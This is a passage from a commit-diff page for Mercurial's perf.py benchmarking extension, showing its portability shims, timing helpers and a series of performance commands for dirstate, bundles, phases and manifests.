##// END OF EJS Templates
util: teach lrucachedict to enforce a max total cost...
Gregory Szorc -
r39604:842cd0bd default
parent child Browse files
Show More
@@ -1,1977 +1,2024 b''
1 1 # perf.py - performance test routines
2 2 '''helper extension to measure performance'''
3 3
4 4 # "historical portability" policy of perf.py:
5 5 #
6 6 # We have to do:
7 7 # - make perf.py "loadable" with as wide Mercurial version as possible
8 8 # This doesn't mean that perf commands work correctly with that Mercurial.
9 9 # BTW, perf.py itself has been available since 1.1 (or eb240755386d).
10 10 # - make historical perf command work correctly with as wide Mercurial
11 11 # version as possible
12 12 #
13 13 # We have to do, if possible with reasonable cost:
14 14 # - make recent perf command for historical feature work correctly
15 15 # with early Mercurial
16 16 #
17 17 # We don't have to do:
18 18 # - make perf command for recent feature work correctly with early
19 19 # Mercurial
20 20
21 21 from __future__ import absolute_import
22 22 import functools
23 23 import gc
24 24 import os
25 25 import random
26 26 import struct
27 27 import sys
28 28 import threading
29 29 import time
30 30 from mercurial import (
31 31 changegroup,
32 32 cmdutil,
33 33 commands,
34 34 copies,
35 35 error,
36 36 extensions,
37 37 mdiff,
38 38 merge,
39 39 revlog,
40 40 util,
41 41 )
42 42
43 43 # for "historical portability":
44 44 # try to import modules separately (in dict order), and ignore
45 45 # failure, because these aren't available with early Mercurial
46 46 try:
47 47 from mercurial import branchmap # since 2.5 (or bcee63733aad)
48 48 except ImportError:
49 49 pass
50 50 try:
51 51 from mercurial import obsolete # since 2.3 (or ad0d6c2b3279)
52 52 except ImportError:
53 53 pass
54 54 try:
55 55 from mercurial import registrar # since 3.7 (or 37d50250b696)
56 56 dir(registrar) # forcibly load it
57 57 except ImportError:
58 58 registrar = None
59 59 try:
60 60 from mercurial import repoview # since 2.5 (or 3a6ddacb7198)
61 61 except ImportError:
62 62 pass
63 63 try:
64 64 from mercurial import scmutil # since 1.9 (or 8b252e826c68)
65 65 except ImportError:
66 66 pass
67 67 try:
68 68 from mercurial import pycompat
69 69 getargspec = pycompat.getargspec # added to module after 4.5
70 70 except (ImportError, AttributeError):
71 71 import inspect
72 72 getargspec = inspect.getargspec
73 73
74 74 try:
75 75 # 4.7+
76 76 queue = pycompat.queue.Queue
77 77 except (AttributeError, ImportError):
78 78 # <4.7.
79 79 try:
80 80 queue = pycompat.queue
81 81 except (AttributeError, ImportError):
82 82 queue = util.queue
83 83
84 84 try:
85 85 from mercurial import logcmdutil
86 86 makelogtemplater = logcmdutil.maketemplater
87 87 except (AttributeError, ImportError):
88 88 try:
89 89 makelogtemplater = cmdutil.makelogtemplater
90 90 except (AttributeError, ImportError):
91 91 makelogtemplater = None
92 92
93 93 # for "historical portability":
94 94 # define util.safehasattr forcibly, because util.safehasattr has been
95 95 # available since 1.9.3 (or 94b200a11cf7)
96 96 _undefined = object()
97 97 def safehasattr(thing, attr):
98 98 return getattr(thing, attr, _undefined) is not _undefined
99 99 setattr(util, 'safehasattr', safehasattr)
100 100
101 101 # for "historical portability":
102 102 # define util.timer forcibly, because util.timer has been available
103 103 # since ae5d60bb70c9
104 104 if safehasattr(time, 'perf_counter'):
105 105 util.timer = time.perf_counter
106 106 elif os.name == b'nt':
107 107 util.timer = time.clock
108 108 else:
109 109 util.timer = time.time
110 110
111 111 # for "historical portability":
112 112 # use locally defined empty option list, if formatteropts isn't
113 113 # available, because commands.formatteropts has been available since
114 114 # 3.2 (or 7a7eed5176a4), even though formatting itself has been
115 115 # available since 2.2 (or ae5f92e154d3)
116 116 formatteropts = getattr(cmdutil, "formatteropts",
117 117 getattr(commands, "formatteropts", []))
118 118
119 119 # for "historical portability":
120 120 # use locally defined option list, if debugrevlogopts isn't available,
121 121 # because commands.debugrevlogopts has been available since 3.7 (or
122 122 # 5606f7d0d063), even though cmdutil.openrevlog() has been available
123 123 # since 1.9 (or a79fea6b3e77).
124 124 revlogopts = getattr(cmdutil, "debugrevlogopts",
125 125 getattr(commands, "debugrevlogopts", [
126 126 (b'c', b'changelog', False, (b'open changelog')),
127 127 (b'm', b'manifest', False, (b'open manifest')),
128 128 (b'', b'dir', False, (b'open directory manifest')),
129 129 ]))
130 130
131 131 cmdtable = {}
132 132
133 133 # for "historical portability":
134 134 # define parsealiases locally, because cmdutil.parsealiases has been
135 135 # available since 1.5 (or 6252852b4332)
136 136 def parsealiases(cmd):
137 137 return cmd.lstrip(b"^").split(b"|")
138 138
139 139 if safehasattr(registrar, 'command'):
140 140 command = registrar.command(cmdtable)
141 141 elif safehasattr(cmdutil, 'command'):
142 142 command = cmdutil.command(cmdtable)
143 143 if b'norepo' not in getargspec(command).args:
144 144 # for "historical portability":
145 145 # wrap original cmdutil.command, because "norepo" option has
146 146 # been available since 3.1 (or 75a96326cecb)
147 147 _command = command
148 148 def command(name, options=(), synopsis=None, norepo=False):
149 149 if norepo:
150 150 commands.norepo += b' %s' % b' '.join(parsealiases(name))
151 151 return _command(name, list(options), synopsis)
152 152 else:
153 153 # for "historical portability":
154 154 # define "@command" annotation locally, because cmdutil.command
155 155 # has been available since 1.9 (or 2daa5179e73f)
156 156 def command(name, options=(), synopsis=None, norepo=False):
157 157 def decorator(func):
158 158 if synopsis:
159 159 cmdtable[name] = func, list(options), synopsis
160 160 else:
161 161 cmdtable[name] = func, list(options)
162 162 if norepo:
163 163 commands.norepo += b' %s' % b' '.join(parsealiases(name))
164 164 return func
165 165 return decorator
166 166
167 167 try:
168 168 import mercurial.registrar
169 169 import mercurial.configitems
170 170 configtable = {}
171 171 configitem = mercurial.registrar.configitem(configtable)
172 172 configitem(b'perf', b'presleep',
173 173 default=mercurial.configitems.dynamicdefault,
174 174 )
175 175 configitem(b'perf', b'stub',
176 176 default=mercurial.configitems.dynamicdefault,
177 177 )
178 178 configitem(b'perf', b'parentscount',
179 179 default=mercurial.configitems.dynamicdefault,
180 180 )
181 181 configitem(b'perf', b'all-timing',
182 182 default=mercurial.configitems.dynamicdefault,
183 183 )
184 184 except (ImportError, AttributeError):
185 185 pass
186 186
187 187 def getlen(ui):
188 188 if ui.configbool(b"perf", b"stub", False):
189 189 return lambda x: 1
190 190 return len
191 191
192 192 def gettimer(ui, opts=None):
193 193 """return a timer function and formatter: (timer, formatter)
194 194
195 195 This function exists to gather the creation of formatter in a single
196 196 place instead of duplicating it in all performance commands."""
197 197
198 198 # enforce an idle period before execution to counteract power management
199 199 # experimental config: perf.presleep
200 200 time.sleep(getint(ui, b"perf", b"presleep", 1))
201 201
202 202 if opts is None:
203 203 opts = {}
204 204 # redirect all to stderr unless buffer api is in use
205 205 if not ui._buffers:
206 206 ui = ui.copy()
207 207 uifout = safeattrsetter(ui, b'fout', ignoremissing=True)
208 208 if uifout:
209 209 # for "historical portability":
210 210 # ui.fout/ferr have been available since 1.9 (or 4e1ccd4c2b6d)
211 211 uifout.set(ui.ferr)
212 212
213 213 # get a formatter
214 214 uiformatter = getattr(ui, 'formatter', None)
215 215 if uiformatter:
216 216 fm = uiformatter(b'perf', opts)
217 217 else:
218 218 # for "historical portability":
219 219 # define formatter locally, because ui.formatter has been
220 220 # available since 2.2 (or ae5f92e154d3)
221 221 from mercurial import node
222 222 class defaultformatter(object):
223 223 """Minimized composition of baseformatter and plainformatter
224 224 """
225 225 def __init__(self, ui, topic, opts):
226 226 self._ui = ui
227 227 if ui.debugflag:
228 228 self.hexfunc = node.hex
229 229 else:
230 230 self.hexfunc = node.short
231 231 def __nonzero__(self):
232 232 return False
233 233 __bool__ = __nonzero__
234 234 def startitem(self):
235 235 pass
236 236 def data(self, **data):
237 237 pass
238 238 def write(self, fields, deftext, *fielddata, **opts):
239 239 self._ui.write(deftext % fielddata, **opts)
240 240 def condwrite(self, cond, fields, deftext, *fielddata, **opts):
241 241 if cond:
242 242 self._ui.write(deftext % fielddata, **opts)
243 243 def plain(self, text, **opts):
244 244 self._ui.write(text, **opts)
245 245 def end(self):
246 246 pass
247 247 fm = defaultformatter(ui, b'perf', opts)
248 248
249 249 # stub function, runs code only once instead of in a loop
250 250 # experimental config: perf.stub
251 251 if ui.configbool(b"perf", b"stub", False):
252 252 return functools.partial(stub_timer, fm), fm
253 253
254 254 # experimental config: perf.all-timing
255 255 displayall = ui.configbool(b"perf", b"all-timing", False)
256 256 return functools.partial(_timer, fm, displayall=displayall), fm
257 257
258 258 def stub_timer(fm, func, title=None):
259 259 func()
260 260
261 261 def _timer(fm, func, title=None, displayall=False):
262 262 gc.collect()
263 263 results = []
264 264 begin = util.timer()
265 265 count = 0
266 266 while True:
267 267 ostart = os.times()
268 268 cstart = util.timer()
269 269 r = func()
270 270 cstop = util.timer()
271 271 ostop = os.times()
272 272 count += 1
273 273 a, b = ostart, ostop
274 274 results.append((cstop - cstart, b[0] - a[0], b[1]-a[1]))
275 275 if cstop - begin > 3 and count >= 100:
276 276 break
277 277 if cstop - begin > 10 and count >= 3:
278 278 break
279 279
280 280 fm.startitem()
281 281
282 282 if title:
283 283 fm.write(b'title', b'! %s\n', title)
284 284 if r:
285 285 fm.write(b'result', b'! result: %s\n', r)
286 286 def display(role, entry):
287 287 prefix = b''
288 288 if role != b'best':
289 289 prefix = b'%s.' % role
290 290 fm.plain(b'!')
291 291 fm.write(prefix + b'wall', b' wall %f', entry[0])
292 292 fm.write(prefix + b'comb', b' comb %f', entry[1] + entry[2])
293 293 fm.write(prefix + b'user', b' user %f', entry[1])
294 294 fm.write(prefix + b'sys', b' sys %f', entry[2])
295 295 fm.write(prefix + b'count', b' (%s of %d)', role, count)
296 296 fm.plain(b'\n')
297 297 results.sort()
298 298 min_val = results[0]
299 299 display(b'best', min_val)
300 300 if displayall:
301 301 max_val = results[-1]
302 302 display(b'max', max_val)
303 303 avg = tuple([sum(x) / count for x in zip(*results)])
304 304 display(b'avg', avg)
305 305 median = results[len(results) // 2]
306 306 display(b'median', median)
307 307
308 308 # utilities for historical portability
309 309
310 310 def getint(ui, section, name, default):
311 311 # for "historical portability":
312 312 # ui.configint has been available since 1.9 (or fa2b596db182)
313 313 v = ui.config(section, name, None)
314 314 if v is None:
315 315 return default
316 316 try:
317 317 return int(v)
318 318 except ValueError:
319 319 raise error.ConfigError((b"%s.%s is not an integer ('%s')")
320 320 % (section, name, v))
321 321
322 322 def safeattrsetter(obj, name, ignoremissing=False):
323 323 """Ensure that 'obj' has 'name' attribute before subsequent setattr
324 324
325 325 This function is aborted, if 'obj' doesn't have 'name' attribute
326 326 at runtime. This avoids overlooking removal of an attribute, which
327 327 breaks assumption of performance measurement, in the future.
328 328
329 329 This function returns the object to (1) assign a new value, and
330 330 (2) restore an original value to the attribute.
331 331
332 332 If 'ignoremissing' is true, missing 'name' attribute doesn't cause
333 333 abortion, and this function returns None. This is useful to
334 334 examine an attribute, which isn't ensured in all Mercurial
335 335 versions.
336 336 """
337 337 if not util.safehasattr(obj, name):
338 338 if ignoremissing:
339 339 return None
340 340 raise error.Abort((b"missing attribute %s of %s might break assumption"
341 341 b" of performance measurement") % (name, obj))
342 342
343 343 origvalue = getattr(obj, name)
344 344 class attrutil(object):
345 345 def set(self, newvalue):
346 346 setattr(obj, name, newvalue)
347 347 def restore(self):
348 348 setattr(obj, name, origvalue)
349 349
350 350 return attrutil()
351 351
352 352 # utilities to examine each internal API changes
353 353
354 354 def getbranchmapsubsettable():
355 355 # for "historical portability":
356 356 # subsettable is defined in:
357 357 # - branchmap since 2.9 (or 175c6fd8cacc)
358 358 # - repoview since 2.5 (or 59a9f18d4587)
359 359 for mod in (branchmap, repoview):
360 360 subsettable = getattr(mod, 'subsettable', None)
361 361 if subsettable:
362 362 return subsettable
363 363
364 364 # bisecting in bcee63733aad::59a9f18d4587 can reach here (both
365 365 # branchmap and repoview modules exist, but subsettable attribute
366 366 # doesn't)
367 367 raise error.Abort((b"perfbranchmap not available with this Mercurial"),
368 368 hint=b"use 2.5 or later")
369 369
370 370 def getsvfs(repo):
371 371 """Return appropriate object to access files under .hg/store
372 372 """
373 373 # for "historical portability":
374 374 # repo.svfs has been available since 2.3 (or 7034365089bf)
375 375 svfs = getattr(repo, 'svfs', None)
376 376 if svfs:
377 377 return svfs
378 378 else:
379 379 return getattr(repo, 'sopener')
380 380
381 381 def getvfs(repo):
382 382 """Return appropriate object to access files under .hg
383 383 """
384 384 # for "historical portability":
385 385 # repo.vfs has been available since 2.3 (or 7034365089bf)
386 386 vfs = getattr(repo, 'vfs', None)
387 387 if vfs:
388 388 return vfs
389 389 else:
390 390 return getattr(repo, 'opener')
391 391
392 392 def repocleartagscachefunc(repo):
393 393 """Return the function to clear tags cache according to repo internal API
394 394 """
395 395 if util.safehasattr(repo, b'_tagscache'): # since 2.0 (or 9dca7653b525)
396 396 # in this case, setattr(repo, '_tagscache', None) or so isn't
397 397 # correct way to clear tags cache, because existing code paths
398 398 # expect _tagscache to be a structured object.
399 399 def clearcache():
400 400 # _tagscache has been filteredpropertycache since 2.5 (or
401 401 # 98c867ac1330), and delattr() can't work in such case
402 402 if b'_tagscache' in vars(repo):
403 403 del repo.__dict__[b'_tagscache']
404 404 return clearcache
405 405
406 406 repotags = safeattrsetter(repo, b'_tags', ignoremissing=True)
407 407 if repotags: # since 1.4 (or 5614a628d173)
408 408 return lambda : repotags.set(None)
409 409
410 410 repotagscache = safeattrsetter(repo, b'tagscache', ignoremissing=True)
411 411 if repotagscache: # since 0.6 (or d7df759d0e97)
412 412 return lambda : repotagscache.set(None)
413 413
414 414 # Mercurial earlier than 0.6 (or d7df759d0e97) logically reaches
415 415 # this point, but it isn't so problematic, because:
416 416 # - repo.tags of such Mercurial isn't "callable", and repo.tags()
417 417 # in perftags() causes failure soon
418 418 # - perf.py itself has been available since 1.1 (or eb240755386d)
419 419 raise error.Abort((b"tags API of this hg command is unknown"))
420 420
421 421 # utilities to clear cache
422 422
423 423 def clearfilecache(repo, attrname):
424 424 unfi = repo.unfiltered()
425 425 if attrname in vars(unfi):
426 426 delattr(unfi, attrname)
427 427 unfi._filecache.pop(attrname, None)
428 428
429 429 # perf commands
430 430
431 431 @command(b'perfwalk', formatteropts)
432 432 def perfwalk(ui, repo, *pats, **opts):
433 433 timer, fm = gettimer(ui, opts)
434 434 m = scmutil.match(repo[None], pats, {})
435 435 timer(lambda: len(list(repo.dirstate.walk(m, subrepos=[], unknown=True,
436 436 ignored=False))))
437 437 fm.end()
438 438
439 439 @command(b'perfannotate', formatteropts)
440 440 def perfannotate(ui, repo, f, **opts):
441 441 timer, fm = gettimer(ui, opts)
442 442 fc = repo[b'.'][f]
443 443 timer(lambda: len(fc.annotate(True)))
444 444 fm.end()
445 445
446 446 @command(b'perfstatus',
447 447 [(b'u', b'unknown', False,
448 448 b'ask status to look for unknown files')] + formatteropts)
449 449 def perfstatus(ui, repo, **opts):
450 450 #m = match.always(repo.root, repo.getcwd())
451 451 #timer(lambda: sum(map(len, repo.dirstate.status(m, [], False, False,
452 452 # False))))
453 453 timer, fm = gettimer(ui, opts)
454 454 timer(lambda: sum(map(len, repo.status(unknown=opts[b'unknown']))))
455 455 fm.end()
456 456
457 457 @command(b'perfaddremove', formatteropts)
458 458 def perfaddremove(ui, repo, **opts):
459 459 timer, fm = gettimer(ui, opts)
460 460 try:
461 461 oldquiet = repo.ui.quiet
462 462 repo.ui.quiet = True
463 463 matcher = scmutil.match(repo[None])
464 464 opts[b'dry_run'] = True
465 465 timer(lambda: scmutil.addremove(repo, matcher, b"", opts))
466 466 finally:
467 467 repo.ui.quiet = oldquiet
468 468 fm.end()
469 469
470 470 def clearcaches(cl):
471 471 # behave somewhat consistently across internal API changes
472 472 if util.safehasattr(cl, b'clearcaches'):
473 473 cl.clearcaches()
474 474 elif util.safehasattr(cl, b'_nodecache'):
475 475 from mercurial.node import nullid, nullrev
476 476 cl._nodecache = {nullid: nullrev}
477 477 cl._nodepos = None
478 478
479 479 @command(b'perfheads', formatteropts)
480 480 def perfheads(ui, repo, **opts):
481 481 timer, fm = gettimer(ui, opts)
482 482 cl = repo.changelog
483 483 def d():
484 484 len(cl.headrevs())
485 485 clearcaches(cl)
486 486 timer(d)
487 487 fm.end()
488 488
489 489 @command(b'perftags', formatteropts)
490 490 def perftags(ui, repo, **opts):
491 491 import mercurial.changelog
492 492 import mercurial.manifest
493 493 timer, fm = gettimer(ui, opts)
494 494 svfs = getsvfs(repo)
495 495 repocleartagscache = repocleartagscachefunc(repo)
496 496 def t():
497 497 repo.changelog = mercurial.changelog.changelog(svfs)
498 498 repo.manifestlog = mercurial.manifest.manifestlog(svfs, repo)
499 499 repocleartagscache()
500 500 return len(repo.tags())
501 501 timer(t)
502 502 fm.end()
503 503
504 504 @command(b'perfancestors', formatteropts)
505 505 def perfancestors(ui, repo, **opts):
506 506 timer, fm = gettimer(ui, opts)
507 507 heads = repo.changelog.headrevs()
508 508 def d():
509 509 for a in repo.changelog.ancestors(heads):
510 510 pass
511 511 timer(d)
512 512 fm.end()
513 513
514 514 @command(b'perfancestorset', formatteropts)
515 515 def perfancestorset(ui, repo, revset, **opts):
516 516 timer, fm = gettimer(ui, opts)
517 517 revs = repo.revs(revset)
518 518 heads = repo.changelog.headrevs()
519 519 def d():
520 520 s = repo.changelog.ancestors(heads)
521 521 for rev in revs:
522 522 rev in s
523 523 timer(d)
524 524 fm.end()
525 525
526 526 @command(b'perfbookmarks', formatteropts)
527 527 def perfbookmarks(ui, repo, **opts):
528 528 """benchmark parsing bookmarks from disk to memory"""
529 529 timer, fm = gettimer(ui, opts)
530 530 def d():
531 531 clearfilecache(repo, b'_bookmarks')
532 532 repo._bookmarks
533 533 timer(d)
534 534 fm.end()
535 535
536 536 @command(b'perfbundleread', formatteropts, b'BUNDLE')
537 537 def perfbundleread(ui, repo, bundlepath, **opts):
538 538 """Benchmark reading of bundle files.
539 539
540 540 This command is meant to isolate the I/O part of bundle reading as
541 541 much as possible.
542 542 """
543 543 from mercurial import (
544 544 bundle2,
545 545 exchange,
546 546 streamclone,
547 547 )
548 548
549 549 def makebench(fn):
550 550 def run():
551 551 with open(bundlepath, b'rb') as fh:
552 552 bundle = exchange.readbundle(ui, fh, bundlepath)
553 553 fn(bundle)
554 554
555 555 return run
556 556
557 557 def makereadnbytes(size):
558 558 def run():
559 559 with open(bundlepath, b'rb') as fh:
560 560 bundle = exchange.readbundle(ui, fh, bundlepath)
561 561 while bundle.read(size):
562 562 pass
563 563
564 564 return run
565 565
566 566 def makestdioread(size):
567 567 def run():
568 568 with open(bundlepath, b'rb') as fh:
569 569 while fh.read(size):
570 570 pass
571 571
572 572 return run
573 573
574 574 # bundle1
575 575
576 576 def deltaiter(bundle):
577 577 for delta in bundle.deltaiter():
578 578 pass
579 579
580 580 def iterchunks(bundle):
581 581 for chunk in bundle.getchunks():
582 582 pass
583 583
584 584 # bundle2
585 585
586 586 def forwardchunks(bundle):
587 587 for chunk in bundle._forwardchunks():
588 588 pass
589 589
590 590 def iterparts(bundle):
591 591 for part in bundle.iterparts():
592 592 pass
593 593
594 594 def iterpartsseekable(bundle):
595 595 for part in bundle.iterparts(seekable=True):
596 596 pass
597 597
598 598 def seek(bundle):
599 599 for part in bundle.iterparts(seekable=True):
600 600 part.seek(0, os.SEEK_END)
601 601
602 602 def makepartreadnbytes(size):
603 603 def run():
604 604 with open(bundlepath, b'rb') as fh:
605 605 bundle = exchange.readbundle(ui, fh, bundlepath)
606 606 for part in bundle.iterparts():
607 607 while part.read(size):
608 608 pass
609 609
610 610 return run
611 611
612 612 benches = [
613 613 (makestdioread(8192), b'read(8k)'),
614 614 (makestdioread(16384), b'read(16k)'),
615 615 (makestdioread(32768), b'read(32k)'),
616 616 (makestdioread(131072), b'read(128k)'),
617 617 ]
618 618
619 619 with open(bundlepath, b'rb') as fh:
620 620 bundle = exchange.readbundle(ui, fh, bundlepath)
621 621
622 622 if isinstance(bundle, changegroup.cg1unpacker):
623 623 benches.extend([
624 624 (makebench(deltaiter), b'cg1 deltaiter()'),
625 625 (makebench(iterchunks), b'cg1 getchunks()'),
626 626 (makereadnbytes(8192), b'cg1 read(8k)'),
627 627 (makereadnbytes(16384), b'cg1 read(16k)'),
628 628 (makereadnbytes(32768), b'cg1 read(32k)'),
629 629 (makereadnbytes(131072), b'cg1 read(128k)'),
630 630 ])
631 631 elif isinstance(bundle, bundle2.unbundle20):
632 632 benches.extend([
633 633 (makebench(forwardchunks), b'bundle2 forwardchunks()'),
634 634 (makebench(iterparts), b'bundle2 iterparts()'),
635 635 (makebench(iterpartsseekable), b'bundle2 iterparts() seekable'),
636 636 (makebench(seek), b'bundle2 part seek()'),
637 637 (makepartreadnbytes(8192), b'bundle2 part read(8k)'),
638 638 (makepartreadnbytes(16384), b'bundle2 part read(16k)'),
639 639 (makepartreadnbytes(32768), b'bundle2 part read(32k)'),
640 640 (makepartreadnbytes(131072), b'bundle2 part read(128k)'),
641 641 ])
642 642 elif isinstance(bundle, streamclone.streamcloneapplier):
643 643 raise error.Abort(b'stream clone bundles not supported')
644 644 else:
645 645 raise error.Abort(b'unhandled bundle type: %s' % type(bundle))
646 646
647 647 for fn, title in benches:
648 648 timer, fm = gettimer(ui, opts)
649 649 timer(fn, title=title)
650 650 fm.end()
651 651
652 652 @command(b'perfchangegroupchangelog', formatteropts +
653 653 [(b'', b'version', b'02', b'changegroup version'),
654 654 (b'r', b'rev', b'', b'revisions to add to changegroup')])
655 655 def perfchangegroupchangelog(ui, repo, version=b'02', rev=None, **opts):
656 656 """Benchmark producing a changelog group for a changegroup.
657 657
658 658 This measures the time spent processing the changelog during a
659 659 bundle operation. This occurs during `hg bundle` and on a server
660 660 processing a `getbundle` wire protocol request (handles clones
661 661 and pull requests).
662 662
663 663 By default, all revisions are added to the changegroup.
664 664 """
665 665 cl = repo.changelog
666 666 nodes = [cl.lookup(r) for r in repo.revs(rev or b'all()')]
667 667 bundler = changegroup.getbundler(version, repo)
668 668
669 669 def d():
670 670 state, chunks = bundler._generatechangelog(cl, nodes)
671 671 for chunk in chunks:
672 672 pass
673 673
674 674 timer, fm = gettimer(ui, opts)
675 675
676 676 # Terminal printing can interfere with timing. So disable it.
677 677 with ui.configoverride({(b'progress', b'disable'): True}):
678 678 timer(d)
679 679
680 680 fm.end()
681 681
682 682 @command(b'perfdirs', formatteropts)
683 683 def perfdirs(ui, repo, **opts):
684 684 timer, fm = gettimer(ui, opts)
685 685 dirstate = repo.dirstate
686 686 b'a' in dirstate
687 687 def d():
688 688 dirstate.hasdir(b'a')
689 689 del dirstate._map._dirs
690 690 timer(d)
691 691 fm.end()
692 692
693 693 @command(b'perfdirstate', formatteropts)
694 694 def perfdirstate(ui, repo, **opts):
695 695 timer, fm = gettimer(ui, opts)
696 696 b"a" in repo.dirstate
697 697 def d():
698 698 repo.dirstate.invalidate()
699 699 b"a" in repo.dirstate
700 700 timer(d)
701 701 fm.end()
702 702
703 703 @command(b'perfdirstatedirs', formatteropts)
704 704 def perfdirstatedirs(ui, repo, **opts):
705 705 timer, fm = gettimer(ui, opts)
706 706 b"a" in repo.dirstate
707 707 def d():
708 708 repo.dirstate.hasdir(b"a")
709 709 del repo.dirstate._map._dirs
710 710 timer(d)
711 711 fm.end()
712 712
713 713 @command(b'perfdirstatefoldmap', formatteropts)
714 714 def perfdirstatefoldmap(ui, repo, **opts):
715 715 timer, fm = gettimer(ui, opts)
716 716 dirstate = repo.dirstate
717 717 b'a' in dirstate
718 718 def d():
719 719 dirstate._map.filefoldmap.get(b'a')
720 720 del dirstate._map.filefoldmap
721 721 timer(d)
722 722 fm.end()
723 723
724 724 @command(b'perfdirfoldmap', formatteropts)
725 725 def perfdirfoldmap(ui, repo, **opts):
726 726 timer, fm = gettimer(ui, opts)
727 727 dirstate = repo.dirstate
728 728 b'a' in dirstate
729 729 def d():
730 730 dirstate._map.dirfoldmap.get(b'a')
731 731 del dirstate._map.dirfoldmap
732 732 del dirstate._map._dirs
733 733 timer(d)
734 734 fm.end()
735 735
736 736 @command(b'perfdirstatewrite', formatteropts)
737 737 def perfdirstatewrite(ui, repo, **opts):
738 738 timer, fm = gettimer(ui, opts)
739 739 ds = repo.dirstate
740 740 b"a" in ds
741 741 def d():
742 742 ds._dirty = True
743 743 ds.write(repo.currenttransaction())
744 744 timer(d)
745 745 fm.end()
746 746
747 747 @command(b'perfmergecalculate',
748 748 [(b'r', b'rev', b'.', b'rev to merge against')] + formatteropts)
749 749 def perfmergecalculate(ui, repo, rev, **opts):
750 750 timer, fm = gettimer(ui, opts)
751 751 wctx = repo[None]
752 752 rctx = scmutil.revsingle(repo, rev, rev)
753 753 ancestor = wctx.ancestor(rctx)
754 754 # we don't want working dir files to be stat'd in the benchmark, so prime
755 755 # that cache
756 756 wctx.dirty()
757 757 def d():
758 758 # acceptremote is True because we don't want prompts in the middle of
759 759 # our benchmark
760 760 merge.calculateupdates(repo, wctx, rctx, [ancestor], False, False,
761 761 acceptremote=True, followcopies=True)
762 762 timer(d)
763 763 fm.end()
764 764
765 765 @command(b'perfpathcopies', [], b"REV REV")
766 766 def perfpathcopies(ui, repo, rev1, rev2, **opts):
767 767 timer, fm = gettimer(ui, opts)
768 768 ctx1 = scmutil.revsingle(repo, rev1, rev1)
769 769 ctx2 = scmutil.revsingle(repo, rev2, rev2)
770 770 def d():
771 771 copies.pathcopies(ctx1, ctx2)
772 772 timer(d)
773 773 fm.end()
774 774
775 775 @command(b'perfphases',
776 776 [(b'', b'full', False, b'include file reading time too'),
777 777 ], b"")
778 778 def perfphases(ui, repo, **opts):
779 779 """benchmark phasesets computation"""
780 780 timer, fm = gettimer(ui, opts)
781 781 _phases = repo._phasecache
782 782 full = opts.get(b'full')
783 783 def d():
784 784 phases = _phases
785 785 if full:
786 786 clearfilecache(repo, b'_phasecache')
787 787 phases = repo._phasecache
788 788 phases.invalidate()
789 789 phases.loadphaserevs(repo)
790 790 timer(d)
791 791 fm.end()
792 792
793 793 @command(b'perfphasesremote',
794 794 [], b"[DEST]")
795 795 def perfphasesremote(ui, repo, dest=None, **opts):
796 796 """benchmark time needed to analyse phases of the remote server"""
797 797 from mercurial.node import (
798 798 bin,
799 799 )
800 800 from mercurial import (
801 801 exchange,
802 802 hg,
803 803 phases,
804 804 )
805 805 timer, fm = gettimer(ui, opts)
806 806
807 807 path = ui.paths.getpath(dest, default=(b'default-push', b'default'))
808 808 if not path:
809 809 raise error.Abort((b'default repository not configured!'),
810 810 hint=(b"see 'hg help config.paths'"))
811 811 dest = path.pushloc or path.loc
812 812 branches = (path.branch, opts.get(b'branch') or [])
813 813 ui.status((b'analysing phase of %s\n') % util.hidepassword(dest))
814 814 revs, checkout = hg.addbranchrevs(repo, repo, branches, opts.get(b'rev'))
815 815 other = hg.peer(repo, opts, dest)
816 816
817 817 # easier to perform discovery through the operation
818 818 op = exchange.pushoperation(repo, other)
819 819 exchange._pushdiscoverychangeset(op)
820 820
821 821 remotesubset = op.fallbackheads
822 822
823 823 with other.commandexecutor() as e:
824 824 remotephases = e.callcommand(b'listkeys',
825 825 {b'namespace': b'phases'}).result()
826 826 del other
827 827 publishing = remotephases.get(b'publishing', False)
828 828 if publishing:
829 829 ui.status((b'publishing: yes\n'))
830 830 else:
831 831 ui.status((b'publishing: no\n'))
832 832
833 833 nodemap = repo.changelog.nodemap
834 834 nonpublishroots = 0
835 835 for nhex, phase in remotephases.iteritems():
836 836 if nhex == b'publishing': # ignore data related to publish option
837 837 continue
838 838 node = bin(nhex)
839 839 if node in nodemap and int(phase):
840 840 nonpublishroots += 1
841 841 ui.status((b'number of roots: %d\n') % len(remotephases))
842 842 ui.status((b'number of known non public roots: %d\n') % nonpublishroots)
843 843 def d():
844 844 phases.remotephasessummary(repo,
845 845 remotesubset,
846 846 remotephases)
847 847 timer(d)
848 848 fm.end()
849 849
850 850 @command(b'perfmanifest',[
851 851 (b'm', b'manifest-rev', False, b'Look up a manifest node revision'),
852 852 (b'', b'clear-disk', False, b'clear on-disk caches too'),
853 853 ], b'REV|NODE')
854 854 def perfmanifest(ui, repo, rev, manifest_rev=False, clear_disk=False, **opts):
855 855 """benchmark the time to read a manifest from disk and return a usable
856 856 dict-like object
857 857
858 858 Manifest caches are cleared before retrieval."""
859 859 timer, fm = gettimer(ui, opts)
860 860 if not manifest_rev:
861 861 ctx = scmutil.revsingle(repo, rev, rev)
862 862 t = ctx.manifestnode()
863 863 else:
864 864 from mercurial.node import bin
865 865
866 866 if len(rev) == 40:
867 867 t = bin(rev)
868 868 else:
869 869 try:
870 870 rev = int(rev)
871 871
872 872 if util.safehasattr(repo.manifestlog, b'getstorage'):
873 873 t = repo.manifestlog.getstorage(b'').node(rev)
874 874 else:
875 875 t = repo.manifestlog._revlog.lookup(rev)
876 876 except ValueError:
877 877 raise error.Abort(b'manifest revision must be integer or full '
878 878 b'node')
879 879 def d():
880 880 repo.manifestlog.clearcaches(clear_persisted_data=clear_disk)
881 881 repo.manifestlog[t].read()
882 882 timer(d)
883 883 fm.end()
884 884
885 885 @command(b'perfchangeset', formatteropts)
886 886 def perfchangeset(ui, repo, rev, **opts):
887 887 timer, fm = gettimer(ui, opts)
888 888 n = scmutil.revsingle(repo, rev).node()
889 889 def d():
890 890 repo.changelog.read(n)
891 891 #repo.changelog._cache = None
892 892 timer(d)
893 893 fm.end()
894 894
895 895 @command(b'perfindex', formatteropts)
896 896 def perfindex(ui, repo, **opts):
897 897 import mercurial.revlog
898 898 timer, fm = gettimer(ui, opts)
899 899 mercurial.revlog._prereadsize = 2**24 # disable lazy parser in old hg
900 900 n = repo[b"tip"].node()
901 901 svfs = getsvfs(repo)
902 902 def d():
903 903 cl = mercurial.revlog.revlog(svfs, b"00changelog.i")
904 904 cl.rev(n)
905 905 timer(d)
906 906 fm.end()
907 907
908 908 @command(b'perfstartup', formatteropts)
909 909 def perfstartup(ui, repo, **opts):
910 910 timer, fm = gettimer(ui, opts)
